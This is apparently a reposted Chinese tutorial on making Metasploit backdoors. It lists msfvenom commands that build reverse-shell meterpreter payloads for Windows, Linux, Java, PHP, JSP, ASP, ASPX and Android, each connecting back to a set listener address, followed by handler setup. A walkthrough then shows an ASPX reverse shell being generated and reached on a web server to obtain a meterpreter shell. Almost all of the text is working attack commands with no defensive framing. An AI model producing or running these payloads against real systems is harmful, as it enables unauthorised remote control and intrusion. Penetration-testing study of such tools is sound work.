Metasploit之多種後門產生

來源:互聯網
上載者:User

標籤:load   raw   php   windows   ever   51cto   test   back   命令   

本章節的後門有以下幾種

windows    -->使用模組“windows/meterpreter/reverse_tcp”
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe
參考“09-Metasploit之我的遠端控制軟體”


linux      -->使用模組“linux/x86/meterpreter/shell_rverse_tcp”
命令:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 X >text
參考文章:http://xiao106347.blog.163.com/blog/static/215992078201310253172937/


java       -->使用模組“java/meterpreter/reverse_tcp”
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 W >text.jar



php        -->使用模組“php/meterpreter/reverse_tcp”
命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php
參考文章:http://www.111cn.net/phper/phpanqn/101228.htm


jsp        -->使用模組“java/jsp_shell_reverse_tcp”
命令:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.jsp
參考文章:http://netsecurity.51cto.com/art/201406/442648.htm


asp        -->使用模組“windows/meterpreter/reverse_tcp”
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp
參考文章:http://www.ithao123.cn/content-10813776.html


aspx       -->使用模組“windows/meterpreter/reverse_tcp”
命令:msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
參考文章:http://www.ithao123.cn/content-10813776.html


android    -->使用模組“android/meterpreter/reverse_tcp”
命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.apk
參考“13-Metasploit之滲透安卓實戰”


反彈串連的訪問:
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

------------------------------------------------------------------------------------------------
Metasploit-web滲透
參考文獻:http://www.ithao123.cn/content-10813776.html

首先用Metasploit產生反彈馬,也就是產生反彈的payload:
成功產生反彈型payload:
(1)
產生win下的exe
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe 

(2)
產生win下的aspx
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
其他的產生payload 的方法見:http://netsec.ws/?p=331

(3)
我產生一個aspx的反彈馬

然後啟動msfconsole

 (4)
本地監聽,反彈後的控制端:use exploit/multi/handler

(5)
本地監聽的確定用哪個payload:
set payload windows/meterpreter/reverse_tcp

(6)
設定本地監聽的連接埠:
set lport 7788

(7)
設定本地的監聽的地址:
set lhost 0.0.0.0

(8)
運行:
run

(9)
訪問產生的反彈馬:
http://xxx.xxx.xx.xxx:/back.aspx

得到meterpreter的shell

 

 

Metasploit之多種後門產生

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.